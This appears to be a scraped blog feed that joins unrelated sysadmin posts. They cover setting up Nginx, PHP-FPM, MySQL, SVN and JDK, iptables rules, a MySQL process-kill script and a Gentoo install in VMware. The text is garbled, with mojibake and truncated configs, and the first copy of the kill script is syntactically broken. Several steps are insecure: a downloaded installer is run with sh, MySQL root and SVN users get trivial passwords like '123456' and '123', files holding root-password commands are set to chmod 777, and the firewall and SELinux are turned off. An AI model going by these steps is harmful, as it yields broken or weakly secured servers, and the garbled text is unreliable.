I described some of the innovations Microsoft is making in the cloud in previous articles, such as one last January in which I described a raft of new cloud offerings in SQL Server 2014 and one last April in which I wrote about the Hadoop-powered offerings of SQL Server HDinsight. Microsoft continues to do cool things in this space, including a feature announced last November at the PASS Summit 2014 conference called StretchDB.

Want to know more? Read the rest of this article at HERE.

Tell me what you think!


Connect with me online! Facebook | Twitter | LinkedIn | Blog | SlideShare | YouTube Google Author

           CentOS 7 安裝 Nginx、PHP7、PHP-FPM        

  1. 安裝 nginx 
    CentOS 7 沒有內建的 nginx,所以先到 nginx 官網  http://nginx.org/en/linux_packages.html#stable ï¼Œæ‰¾åˆ° CentOS 7 的 nginx-release package 檔案連結,然後如下安裝
    rpm -Uvh http://nginx.org/packages/centos/7/noarch/RPMS/nginx-release-centos-7-0.el7.ngx.noarch.rpm
    安裝後,會自動產生 yum 的 repository 設定(在 /etc/yum.repos.d/nginx.repo), 
    接下來便可以使用 yum 指令安裝 nginx
    yum install nginx
  2. 啟動 nginx 
    以前用 chkconfig 管理服務,CentOS 7 改用 systemctl 管理系統服務 
    systemctl start nginx
    systemctl status nginx
    查看 nginx 服務目前的啟動設定
    systemctl list-unit-files | grep nginx
    若是 disabled,可以改成開機自動啟動
    systemctl enable nginx
    若有設定防火牆,查看防火牆運行狀態,看是否有開啟 nginx 使用的 port
    firewall-cmd --state
    永久開放開啟防火牆的 http 服務
    firewall-cmd --permanent --zone=public --add-service=http
    firewall-cmd --reload
    列出防火牆 public 的設定
    firewall-cmd --list-all --zone=public
    經過以上設定,應該就可以使用瀏覽器訪問 nginx 的預設頁面。
  3. 安裝 PHP-FPM 
    使用 yum 安裝 php、php-fpm、php-mysql
    yum install php php-fpm php-mysql
    查看 php-fpm 服務目前的啟動設定 
    systemctl list-unit-files | grep php-fpm
    systemctl enable php-fpm
    systemctl start php-fpm
    systemctl status php-fpm
  4. 修改 PHP-FPM listen 的方式 
    若想將 PHP-FPM listen 的方式,改成 unix socket,可以編輯 /etc/php-fpm.d/www.conf 
    listen =
    listen = /var/run/php-fpm/php-fpm.sock
    然後重新啟動 php-fpm
    systemctl restart php-fpm
    註:不要改成 listen = /tmp/php-fcgi.sock (將 php-fcgi.sock 設定在 /tmp 底下), 因為系統產生 php-fcgi.sock 時,會放在 /tmp/systemd-private-*/tmp/php-fpm.sock 隨機私有目錄下, 除非把 /usr/lib/systemd/system/ 裡面的 PrivateTmp=true 設定改成 PrivateTmp=false, 但還是會產生其他問題,所以還是換個位置最方便 


    # yum remove php*

    rpm 安装 Php7 相应的 yum源

    CentOS/RHEL 7.x:

    # rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm # rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm

    CentOS/RHEL 6.x:
    # rpm -Uvh https://mirror.webtatic.com/yum/el6/latest.rpm


    yum install php70w php70w-opcache


    配置(configure)、编译(make)、安装(make install)

    使用configure --help


    Configuration: --cache-file=FILE       cache test results in FILE --help                  print this message --no-create             do not create output files --quiet, --silent       do not print `checking...' messages --version               print the version of autoconf that created configure Directory and file names: --prefix=PREFIX         install architecture-independent files in PREFIX [/usr/local] --exec-prefix=EPREFIX   install architecture-dependent files in EPREFIX



    为可执行程序声明目录,缺省是 EXEC-PREFIX/bin
    设置所安装的程序需要的只读文件的目录.缺省是 PREFIX/share
    用于各种各样配置文件的目录,缺省为 PREFIX/etc
    库文件和动态装载模块的目录.缺省是 EXEC-PREFIX/lib
    C 和 C++ 头文件的目录.缺省是 PREFIX/include
    文档文件,(除 “man(手册页)”以外, 将被安装到这个目录.缺省是 PREFIX/doc
    随着程序一起带的手册页 将安装到这个目录.在它们相应的manx子目录里. 缺省是PREFIX/man
    注意: 为了减少对共享安装位置(比如 /usr/local/include) 的污染,configure 自动在 datadir, sysconfdir,includedir, 和 docdir 上附加一个 “/postgresql” 字串, 除非完全展开以后的目录名字已经包含字串 “postgres” 或者 “pgsql”.比如,如果你选择 /usr/local 做前缀,那么 C 的头文件将安装到 /usr/local/include/postgresql, 但是如果前缀是 /opt/postgres,那么它们将 被放进 /opt/postgres/include
    DIRECTORIES 是一系列冒号分隔的目录,这些目录将被加入编译器的头文件 搜索列表中.如果你有一些可选的包(比如 GNU Readline)安装在 非标准位置,你就必须使用这个选项,以及可能还有相应的 --with-libraries 选项.
    DIRECTORIES 是一系列冒号分隔的目录,这些目录是用于查找库文件的. 如果你有一些包安装在非标准位置,你可能就需要使用这个选项 (以及对应的--with-includes选项)

    • PHP FPM設定參考
      pid = /usr/local/php/var/run/php-fpm.pid
      error_log = /usr/local/php/var/log/php-fpm.log
      listen = /var/run/php-fpm/php-fpm.sock
      user = www
      group = www
      pm = dynamic
      pm.max_children = 800
      pm.start_servers = 200
      pm.min_spare_servers = 100
      pm.max_spare_servers = 800
      pm.max_requests = 4000
      rlimit_files = 51200
      listen.backlog = 65536
      ;設 65536 的原因是-1 可能不是unlimited
      ;說明 http://php.net/manual/en/install.fpm.configuration.php#104172
      slowlog = /usr/local/php/var/log/slow.log
      request_slowlog_timeout = 10
    • nginx.conf 設定參考 
      user  nginx;
      worker_processes  8;
      error_log  /var/log/nginx/error.log warn;
      pid		/var/run/nginx.pid;
      events {
        use epoll;
        worker_connections  65535;
      worker_rlimit_nofile 65535;
      #若沒設定,可能出現錯誤:65535 worker_connections exceed open file resource limit: 1024
      http {
        include	   /etc/nginx/mime.types;
        default_type  application/octet-stream;
        log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
                  '$status $body_bytes_sent "$http_referer" '
                  '"$http_user_agent" "$http_x_forwarded_for"';
        access_log  /var/log/nginx/access.log  main;
        sendfile		on;
        tcp_nopush	 on;
        keepalive_timeout  65;
        server_names_hash_bucket_size 128;
        client_header_buffer_size 32k;
        large_client_header_buffers 4 32k;
        client_max_body_size 8m;
        server_tokens  off;
        client_body_buffer_size  512k;
        # fastcgi
        fastcgi_connect_timeout 300;
        fastcgi_send_timeout 300;
        fastcgi_read_timeout 300;
        fastcgi_buffer_size 64k;
        fastcgi_buffers 4 64k;
        fastcgi_busy_buffers_size 128k;
        fastcgi_temp_file_write_size 128k;
        fastcgi_intercept_errors on;
        #gzip (說明 http://nginx.org/en/docs/http/ngx_http_gzip_module.html)
        gzip  off;
        gzip_min_length  1k;#1k以上才壓縮
        gzip_buffers 32  4k;
          #使用 getconf PAGESIZE 取得系統 one memory page size,
        gzip_http_version  1.0;
        gzip_comp_level  2;
        gzip_types  text/css text/xml application/javascript application/atom+xml application/rss+xml text/plain application/json;
          #查看 nginx 的 mime.types 檔案(/etc/nginx/mime.types),裡面有各種類型的定義
        gzip_vary  on;
        include /etc/nginx/conf.d/*.conf;
      若出現出現錯誤:setrlimit(RLIMIT_NOFILE, 65535) failed (1: Operation not permitted) 
      ulimit -n
      若設定值太小,修改 /etc/security/limits.conf
      vi /etc/security/limits.conf
      * soft nofile 65535
      * hard nofile 65535

Alpha 2016-08-10 13:44 发表评论

          Ubuntu 14.04 安装 php nginx mysql JDK 8 svn        

安装 MySQL 5 数据库

安装 MySQL 运行命令:

sudo apt-get install mysql-server mysql-client

将mysql的datadir从默认的/var/lib/mysql 移到/app/data/mysql下,操作如下:
1.修改了/etc/mysql/my.cnf,改为:datadir = /app/data/mysql
2.cp -a /var/lib/mysql /app/data/
3./etc/init.d/mysql start

如果出现系统报错,无法启动mysql,日志显示为:Can't find file: "./mysql/plugin.frm'(errno:13)
[ERROR] Can't open the mysql.plugin table. Please run mysql_upgrade to create it.


1.修改usr.sbin.mysqld里面的两行内容:/var/lib/mysql/ r,改为:/app/data/mysql/ r,/var/lib/mysql/** rwk,改为:/app/data/mysql/** rwk,
2.修改abstractions/mysql中一行:/var/lib/mysql/mysql.sock rw,改为:/app/data/mysql/mysql.sock rw,
3.重新加载apparmor服务:/etc/init.d/apparmor reload

安装 Nginx

在安装 Nginx 之前,如果你已经安装 Apache2 先删除在安装 nginx:

service apache2 stop
update-rc.d -f apache2 remove
sudo apt-get remove apache2

sudo apt-get install nginx

安装 PHP5

我们必须通过 PHP-FPM æ‰èƒ½è®©PHP5正常工作,安装命令:

sudo apt-get install php5-fpm



sudo apt-get install php5-gd libapache2-mod-auth-mysql php5-mysql openssl libssl-dev

sudo apt-get install curl libcurl3 libcurl3-dev php5-curl

安装 JDK8


lxh@ubuntu:~$ wget -c http://download.oracle.com/otn-pub/java/jdk/8u11-b12/jdk-8u25-linux-x64.tar.gz


lxh@ubuntu:~$ mkdir -p /usr/lib/jvm 
lxh@ubuntu:~$ sudo mv jdk-8u25-linux-x64.tar.gz /usr/lib/jvm
lxh@ubuntu:~$ cd /usr/lib/jvm
lxh@ubuntu:~$ sudo tar xzvf jdk-8u25-linux-x64.tar.gz


lxh@ubuntu:~$ sudo vim ~/.profile


export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_25/
export JRE_HOME=/usr/lib/jvm/jdk1.8.0_25/jre
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JAVA_HOME/lib:$JRE_HOME/lib:$CLASSPATH
export PATH=$JAVA_HOME/bin:$PATH


lxh@ubuntu:~$ $source ~/.profile



sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.8.0_25/bin/java 300
sudo update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk1.8.0_25/bin/javac 300
sudo update-alternatives --config java

因为我是在虚拟机中安装的Ubuntu 14.04,默认不安装OpenJDK,所以没有需要选择的JDK版本。如果是在物理机上安装的Ubuntu版本,会出现几个候选项,可用于替换 java (提供 /usr/bin/java)。


1. 下载最新版nginx
3. 安装
$ ./configure  #检查编译前置条件
$ make  #编译
$ sudo make install  #使用sudo权限进行安装
安装后路径在 /usr/local/
1)使用在 /etc/init.d/ 目录下创建名为 nginx 文件,注意没有后缀名,将以下内容复制到该文件中(感谢提供脚本的兄弟)。
 1 #! /bin/sh
 2 #用来将Nginx注册为系统服务的脚本
 3 #Author CplusHua
 4 #http://www.219.me
 5 #chkconfig: - 85 15
 6 set -e
 7 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 8 DESC="Nginx Daemon"
 9 NAME=nginx
10 DAEMON=/usr/local/nginx/sbin/$NAME
11 SCRIPTNAME=/etc/init.d/$NAME
12 #守护进程不存在就退出
13 test -x $DAEMON ||exit 0
14 d_start(){
15   $DAEMON ||echo -n "aready running"
16 }
17 d_stop(){
18   $DAEMON -s quit || echo -n "not running"
19 }
20 d_reload(){
21   $DAEMON -s reload || echo -n "could not reload"
22 }
23 case "$1" in
24   start)
25     echo -n "Starting $DESC: $NAME"
26     d_start
27     echo "."
28   ;;
29   stop)
30     echo -n "Stopping $DESC: $NAME"
31     d_stop
32     echo "."
33   ;;
34   reload)
35     echo -n "Reloading $DESC: configurationg.."
36     d_reload
37     echo "reloaded."
38   ;;
39   restart)
40     echo -n "Restarting $DESC: $NAME"
41     d_stop
42     sleep 3
43     d_start
44     echo "."
45   ;;
46   *)
47     echo "Usage: $SCRIPTNAME {start|stop|restart|reload}" >&2
48     exit 3
49   ;;
50 esac
52 exit 0

    $ sudo chmod +x nginx
3)服务方式启动 如果配置服务前已启动,执行以下命令停止Nginx。
    $ sudo service nginx stop
    $ sudo service nginx start

pastingnginx出现connect() to unix:/var/run/php5-fpm.sock failed (13: Permission denied)的错误


    listen.owner = www-data
    listen.group = www-data
    listen.mode = 0660

    $ sudo service php5-fpm restart

Ubuntu 14.04快速搭建SVN服务器及日常使用


    # apt-get install subversion
    # sudo mkdir /app/svn
    # sudo svnadmin create /app/svn/prj

  # sudo vi svnserve.conf  #将以下参数去掉注释 
  anon-access = none    #匿名访问权限,默认read,none为不允许访问 
  auth-access = write  #认证用户权限  
  password-db = passwd  #用户信息存放文件,默认在版本库/conf下面,也可以绝对路径指定文件位置 
  authz-db = authz

  # sudo vi passwd    #格式是用户名=密码,采用明文密码 
  xiaoming = 123 
  zhangsan = 123 
   lisi = 123

# sudo vi authz  
  [groups]          #定义组的用户 
  manager = xiaoming 
  core_dev = zhangsan,lisi 
  [repos:/]          #以根目录起始的repos版本库manager组为读写权限 
  @manager = rw 
  [repos:/media]    #core_dev对repos版本库下media目录为读写权限 
  @core_dev = rw


  # sudo svnserve -d -r /app/svn
  # 查看是否启动成功,可看的监听3690端口
  # sudo netstat -antp |grep svnserve
  tcp    0      0*      LISTEN    28967/svnserve 
  # 如果想关闭服务,可使用pkill svnserve

  # 访问repos版本库地址

   svnadmin dump备份
  # 完整备份
  svnadmin dump /app/svn/prj > YYmmdd_fully_backup.svn
  # 完整压缩备份
  svnadmin dump /app/svn/prj | gzip > YYmmdd_fully_backup.gz
  # 备份恢复
  svnadmin load /app/svn/prj < YYmmdd_fully_backup.svn
  zcat YYmmdd_fully_backup.gz | svnadmin load repos
  ### 增量备份 ###
  # 先完整备份
  svnadmin dump /app/svn/prj -r 0:100 > YYmmdd_incremental_backup.svn
  # 再增量备份
  svnadmin dump /app/svn/prj -r 101:200 --incremental > YYmmdd_incremental_backup.svn
svnadmin hotcopy备份

  # 备份
  svnadmin hotcopy /app/svn/prj YYmmdd_fully_backup --clean-logs
  # 恢复
  svnadmin hotcopy YYmmdd_fully_backup /app/svn/prj

Tomcat 内存优化


要添加在tomcat 的bin 下catalina.sh 里,位置cygwin=false前 。注意引号要带上,红色的为新添加的.

# OS specific support. $var _must_ be set to either true or false.
JAVA_OPTS="-server -Xms512M -Xmx512M -Xss256K -Djava.awt.headless=true -Dfile.encoding=utf-8 -XX:PermSize=64M -XX:MaxPermSize=128m"


Alpha 2015-10-07 15:28 发表评论

          iptables 开启80端口         

经常使用CentOS的朋友,可能会遇到和我一样的问题。最近在Linux CentOS防火墙下安装配置 ORACLE 





/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT
/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT


/etc/rc.d/init.d/iptables save
centos 5.3,5.4以上的版本需要用
service iptables save


/etc/init.d/iptables restart


查看CentOS防火墙信息:/etc/init.d/iptables status

关闭CentOS防火墙服务:/etc/init.d/iptables stop


chkconfig –level 35 iptables off


iptables -P INPUT DROP

这样就拒绝所有访问 CentOS 5.3 本系统数据,除了 Chain RH-Firewall-1-INPUT (2 references) 的规则外 , 呵呵。

用命令配置了 iptables 一定还要 service iptables save 才能保存到配置文件。

cat /etc/sysconfig/iptables 可以查看 防火墙 iptables 配置文件内容

# Generated by iptables-save v1.3.5 on Sat Apr 14 07:51:07 2001
:OUTPUT ACCEPT [1513:149055]
:RH-Firewall-1-INPUT - [0:0]
-A INPUT -j RH-Firewall-1-INPUT
-A FORWARD -j RH-Firewall-1-INPUT
-A RH-Firewall-1-INPUT -i lo -j ACCEPT
-A RH-Firewall-1-INPUT -p icmp -m icmp --icmp-type any -j ACCEPT
-A RH-Firewall-1-INPUT -p esp -j ACCEPT
-A RH-Firewall-1-INPUT -p ah -j ACCEPT
-A RH-Firewall-1-INPUT -d -p udp -m udp --dport 5353 -j ACCEPT
-A RH-Firewall-1-INPUT -p udp -m udp --dport 631 -j ACCEPT
-A RH-Firewall-1-INPUT -p tcp -m tcp --dport 631 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A RH-Firewall-1-INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT
-A RH-Firewall-1-INPUT -j REJECT --reject-with icmp-host-prohibited
# Completed on Sat Apr 14 07:51:07 2001

CentOS 防火墙配置 80端口
#/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT
#/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT

#/etc/rc.d/init.d/iptables save

[root@vcentos ~]# /etc/init.d/iptables status
Table: filter
Chain INPUT (policy ACCEPT)
num target prot opt source destination
1 ACCEPT udp -- udp dpt:80
2 ACCEPT tcp -- tcp dpt:80
3 RH-Firewall-1-INPUT all --

Chain FORWARD (policy ACCEPT)
num target prot opt source destination
1 RH-Firewall-1-INPUT all --

* 设置iptables为自动启动
chkconfig --level 2345 iptables on



* æ‰“开指令 
iptables -A INPUT -p tcp -s xxx.xxx.xxx.xxx --dport 3306 -j ACCEPT 

* å…³é—­æŒ‡ä»¤ 
iptables -D INPUT -p tcp -s xxx.xxx.xxx.xxx --dport 3306 -j ACCEPT

nginx 80 端口访问不了?
 iptables -A INPUT -i lo -j ACCEPT 

Alpha 2012-09-17 23:59 发表评论


[root@CentOS ~]# chkconfig iptables off

vi /etc/sysconfig/selinux

3、配置CentOS 6.0 第三方yum源(CentOS默认的标准源里没有nginx软件包)
[root@CentOS ~]# yum install wget
[root@CentOS ~]# wget http://www.atomicorp.com/installers/atomic
//下载atomic yum源
[root@CentOS ~]# sh ./atomic
[root@CentOS ~]# yum check-update

[root@CentOS ~]# yum -y install ntp make openssl openssl-devel pcre pcre-devel libpng
libpng-devel libjpeg-6b libjpeg-devel-6b freetype freetype-devel gd gd-devel zlib zlib-devel
gcc gcc-c++ libXpm libXpm-devel ncurses ncurses-devel libmcrypt libmcrypt-devel libxml2
libxml2-devel imake autoconf automake screen sysstat compat-libstdc++-33 curl curl-devel

[root@CentOS ~]# yum remove httpd
[root@CentOS ~]# yum remove mysql
[root@CentOS ~]# yum remove php

[root@CentOS ~]# yum install nginx
[root@CentOS ~]# service nginx start
[root@CentOS ~]# chkconfig --levels 235 nginx on

[root@CentOS ~]# yum install mysql mysql-server mysql-devel
[root@CentOS ~]# service mysqld start
[root@CentOS ~]# chkconfig --levels 235 mysqld on
[root@CentOS ~]# mysqladmin -u root password "123456"
[root@CentOS ~]# service mysqld restart

[root@CentOS ~]# yum install php lighttpd-fastcgi php-cli php-mysql php-gd php-imap php-ldap
php-odbc php-pear php-xml php-xmlrpc php-mbstring php-mcrypt php-mssql php-snmp php-soap
php-tidy php-common php-devel php-fpm
[root@CentOS ~]# service php-fpm start
[root@CentOS ~]# chkconfig --levels 235 php-fpm on

[root@CentOS ~]# mv /etc/nginx/nginx.conf /etc/nginx/nginx.confbak
[root@CentOS ~]# cp /etc/nginx/nginx.conf.default /etc/nginx/nginx.conf
[root@CentOS ~]# vi /etc/nginx/nginx.conf
index index.php index.html index.htm;
location ~ \.php$ {
root /usr/share/nginx/html;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /usr/share/nginx/html$fastcgi_script_name;
include fastcgi_params;

//编辑文件php.ini,在文件末尾添加cgi.fix_pathinfo = 1
[root@CentOS ~]# vi /etc/php.ini

11.重启nginx php-fpm
[root@CentOS ~]# service nginx restart
[root@CentOS ~]# service php-fpm restart

[root@CentOS ~]# vi /usr/share/nginx/html/info.php


Alpha 2012-09-12 18:39 发表评论

 MySQL + PHP的模式在大并发压力下经常会导致MySQL中存在大量僵死进程,导致服务挂死。为了自动干掉这些进程,弄了个脚本,放在服务器后台通过crontab自动执行。发现这样做了以后,的确很好的缓解了这个问题。把这个脚本发出来和大家Share。


$mysqladmin_exec -uroot -p"$mysql_pwd" processlist | awk '{ print $12 , $2 ,$4}' | grep -Time | grep -'|' | sort -rn > $mysql_timeout_log
'{if($1>30 && $3!="root") print "'""$mysql_exec""' -e " "/"" "kill",$2 "/"" " -uroot " "-p""/"""'""$mysql_pwd""'""/"" ";" }' $mysql_timeout_log > $mysql_kill_timeout_sh
"check start ." >> $mysql_kill_timeout_log
echo `date` 
>> $mysql_kill_timeout_log

  把这个写到mysqld_kill_sleep.sh。然后chmod 0 mysqld_kill_sleep.sh,chmod u+rx mysqld_kill_sleep.sh,然后用root账户到cron里面运行即可,时间自己调整。执行之后显示:
www# ./mysqld_kill_sleep.sh
/usr/local/bin/mysql -e "kill 27549" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27750" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27840" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27867" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27899" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27901" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27758" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27875" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27697" -uroot -p"mysql root的密码";
"kill 27888" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27861" -uroot -p"mysql root的密码";

$mysql_exec -uroot -p$mysql_pwd -e "show processlist" | grep -i "Locked" >> $mysql_kill_timeout_log

for line in `$mysql_kill_timeout_log  | awk '{print $1}'`
echo "$mysql_exec -uroot -p$mysql_pwd -e /"kill $line/"" >> $mysql_kill_timeout_sh

cat $mysql_kill_timeout_sh




  就可以解决了,kill掉第一个锁表的进程, 依然没有改善.既然不改善,咱们就想办法将所有锁表的进程kill掉吧,简单的脚本如下:
mysql-uroot-e"show processlist"|grep-i"Locked">>locked_log.txt

forlinein`cat locked_log.txt | awk '{print$1}'`



foridin`mysqladmin processlist | grep -i locked | awk '{print$1}'`


mysql> SELECT concat('KILL ',id,';') FROM information_schema.processlist WHERE user='root';
| concat('KILL ',id,';')
| KILL 3101;            
| KILL 2946;            
2 rows IN SET (0.00 sec)

mysql> SELECT concat('KILL ',id,';') FROM information_schema.processlist WHERE user='root' INTO OUTFILE '/tmp/a.txt';
Query OK, 2 rows affected (0.00 sec)

mysql> source /tmp/a.txt;
Query OK, 0 rows affected (0.00 sec)


  MySQL + PHP的模式在大并发压力下经常会导致MySQL中存在大量僵死进程,导致服务挂死。为了自动干掉这些进程,弄了个脚本,放在服务器后台通过crontab自动执行。发现这样做了以后,的确很好的缓解了这个问题。把这个脚本发出来和大家Share。根据自己的实际需要,做了一些修改:

$mysqladmin_exec -uroot -p"$mysql_pwd" processlist | awk '{ print $12 , $2 ,$4}' | grep -v Time | grep -v '|' | sort -rn > $mysql_timeout_log
awk '{if($1>30 && $3!="root") print "'""$mysql_exec""' -e " "\"" "kill",$2 "\"" " -uroot " "-p""\"""'""$mysql_pwd""'""\"" ";" }' $mysql_timeout_log > $mysql_kill_timeout_sh
echo "check start ...." >> $mysql_kill_timeout_log
echo `date` >> $mysql_kill_timeout_log
cat $mysql_kill_timeout_sh

  把这个写到mysqld_kill_sleep.sh。然后chmod 0 mysqld_kill_sleep.sh,chmod u+rx mysqld_kill_sleep.sh,然后用root账户到cron里面运行即可,时间自己调整。执行之后显示:
www# ./mysqld_kill_sleep.sh
/usr/local/bin/mysql -e "kill 27549" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27750" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27840" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27867" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27899" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27901" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27758" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27875" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27697" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27888" -uroot -p"mysql root的密码";
/usr/local/bin/mysql -e "kill 27861" -uroot -p"mysql root的密码";

$mysql_exec -uroot -p$mysql_pwd -e "show processlist" | grep -i "Locked" >> $mysql_kill_timeout_log
chmod 777 $mysql_kill_timeout_log
for line in `$mysql_kill_timeout_log  | awk '{print $1}'`
echo "$mysql_exec -uroot -p$mysql_pwd -e \"kill $line\"" >> $mysql_kill_timeout_sh
chmod 777 $mysql_kill_timeout_sh
cat $mysql_kill_timeout_sh

1、进入mysql/bin目录下输入mysqladmin processlist;
2、启动mysql,输入show processlist;

mysql> show processlist;


| Id | User | Host | db | Command | Time| State | Info


|207|root | |mytest | Sleep | 5 | | NULL

|208|root | |mytest | Sleep | 5 | | NULL

|220|root | |mytest |Query | 84 | Locked |

select bookname,culture,value,type from book where id=001

  先简单说一下各列的含义和用途,第一列,id,不用说了吧,一个标识,你要kill一个语句的时候很有用。user列,显示单前用户,如果不是root,这个命令就只显示你权限范围内的sql语句。host列,显示这个语句是从哪个ip的哪个端口上发出的。呵呵,可以用来追踪出问题语句的用户。db列,显示这个进程目前连接的是哪个数据库。command列,显示当前连接的执行的命令,一般就是休眠(sleep),查询(query),连接(connect)。time列,此这个状态持续的时间,单位是秒。state列,显示使用当前连接的sql语句的状态,很重要的列,后续会有所有的状态的描述,请注意,state只是语句执行中的某一个状态,一个sql语句,已查询为例,可能需要经过copying to tmp table,Sorting result,Sending data等状态才可以完成,info列,显示这个sql语句,因为长度有限,所以长的sql语句就显示不全,但是一个判断问题语句的重要依据。

Checking table

Closing tables

Connect Out

Copying to tmp table on disk

Creating tmp table

deleting from main table

deleting from reference tables

Flushing tables

  正在执行FLUSH TABLES,等待其他线程关闭数据表。


Sending data

Sorting for group

  正在为GROUP BY做排序。
Sorting for order

  正在为ORDER BY做排序。
Opening tables

  这个过程应该会很快,除非受到其他因素的干扰。例如,在执Alter TABLE或LOCK TABLE语句行完以前,数据表无法被其他线程打开。正尝试打开一个表。
Removing duplicates

  正在执行一个Select DISTINCT方式的查询,但是MySQL无法在前一个阶段优化掉那些重复的记录。因此,MySQL需要再次去掉重复的记录,然后再把结果发送给客户端。
Reopen table

Repair by sorting

Repair with keycache

  修复指令正在利用索引缓存一个一个地创建新索引。它会比Repair by sorting慢些。
Searching rows for update


System lock

Upgrading lock

  Insert DELAYED正在尝试取得一个锁表以插入新记录。

User Lock

Waiting for tables


waiting for handler insert

  Insert DELAYED已经处理完了所有待处理的插入操作,正在等待新的请求。大部分状态对应很快的操作,只要有一个线程保持同一个状态好几秒钟,那么可能是有问题发生了,需要检查一下。


Alpha 2012-01-19 14:20 发表评论


前些时间在VMware上安装了Gentoo Linux,用了当前最新版的Gentoo,安装过程记录下来了,但一直没有整理到blog上。今天重新整理一下,写出来与大家分享和备用。接触Gentoo不久,对这个版本还不是很熟。



Host机环境:Win2008 + VMware 7.1


下载安装 CD 和 stage3 包:


我用的是 x86平台的:


wget -c http://distfiles.gentoo.org/releases/x86/autobuilds/current-iso/install-x86-minimal-20100216.iso

wget -c http://distfiles.gentoo.org/releases/x86/autobuilds/current-iso/stage3-i686-20100216.tar.bz2

wget -c http://distfiles.gentoo.org/snapshots/portage-20100617.tar.bz2



将安装 CD 插入虚拟机,默认引导进入终端。

先配置好网络,之后的操作可以全部通过 ssh 连接来操作。

ifconfig eth0我这里VM已经自动分配了这个内网IP了。)
echo nameserver > /etc/resolv.conf
echo nameserver > /etc/resolv.conf

设置 root 用户密码:

passwd root

启动 sshd 服务:

/etc/init.d/sshd start




cfdisk /dev/sda



mkfs.ext3 /dev/sda1
mkfs.ext3 /dev/sda2
mkswap /dev/sda3


swapon /dev/sda3


nano -w /etc/fstab


/dev/sda1 /boot ext3 noauto,noatime 1 2
/dev/sda2 / ext3 noatime 0 1
/dev/sda3 none swap sw 0 0

解压 stage3 和 portage


mount /dev/sda2 /mnt/gentoo
mkdir /mnt/gentoo/boot
mount /dev/sda1 /mnt/gentoo/boot
cd /mnt/gentoo

使用WinSCP或CuteFTP 上传 stage3 软件包到 /mnt/gentoo下,然后解压:


tar jxvf stage3-i686-20100608.tar.bz2
rm -f stage3-i686-20100608.tar.bz2

上传 portage 包到 /mnt/gentoo/usr,然后解压:

tar jxvf portage-20100617.tar.bz2
rm -f portage-20100617.tar.bz2


cd /
mount -t proc proc /mnt/gentoo/proc
mount -o bind /dev /mnt/gentoo/dev
cp -L /etc/resolv.conf /mnt/gentoo/etc/
chroot /mnt/gentoo /bin/bash
env-update && source /etc/profile


cd /etc
echo “ gentoo.at.home gentoo localhost” > hosts
sed -i -e ’s/HOSTNAME.*/HOSTNAME=”gentoo”/’ conf.d/hostname
hostname gentoo




floppy 55736 0
rtc 7960 0
tg3 103228 0
libphy 24952 1 tg3
e1000 114636 0
fuse 59344 0
jfs 153104 0
raid10 20648 0


emerge –sync
emerge gentoo-sources
cd /usr/src/linux
make menuconfig

在配置界面输入/e1000,搜索 e1000,找到驱动所在位置:

| Symbol: E1000 [=y]
| Prompt: Intel(R) PRO/1000 Gigabit Ethernet support
| Defined at drivers/net/Kconfig:2020
| Depends on: NETDEVICES && NETDEV_1000 && PCI
| Location:
| -> Device Drivers
| -> Network device support (NETDEVICES [=y])
| -> Ethernet (1000 Mbit) (NETDEV_1000 [=y])


虚拟机的硬盘使用的 SCSI 适配器为 LSI Logic。

需要增加对 Fusion MPT base driver 的支持(见 dmesg 日志):

Device Drivers —>
— Fusion MPT device support
<*> Fusion MPT ScsiHost drivers for SPI
<*> Fusion MPT ScsiHost drivers for FC
<*> Fusion MPT ScsiHost drivers for SAS
(128) Maximum number of scatter gather entries (16 – 128)
<*> Fusion MPT misc device (ioctl) driver


VFS: Unable to mount root fs via NFS, trying floppy.
VFS: Cannot open root device “sda2”or unknown-block(2,0)
Please append a correct “root=” boot option; here are the available partitions:
0b00 1048575 sr0 driver: sr
Kernel panic – not syncing: VFS: Unable to mount root fs on unknown-block(2,0)

增加对 ext4文件系统的支持:

File systems —>
<*> Second extended fs support
[*] Ext4 extended attributes
[*] Ext4 POSIX Access Control Lists
[*] Ext4 Security Labels
[*] Ext4 debugging support


make -j2
make modules_install
cp arch/x86/boot/bzImage /boot/kernel

安装配置 grub

emerge grub

> root (hd0,0)
> setup (hd0)
> quit


nano -w /boot/grub/grub.conf

grub.conf 内容如下:

default 0
timeout 9

title Gentoo
root (hd0,0)
kernel /boot/kernel root=/dev/sda2



nano -w /etc/fstab
/dev/sda1 /boot ext3 noauto,noatime 1 2
/dev/sda2 / ext3 noatime 0 1
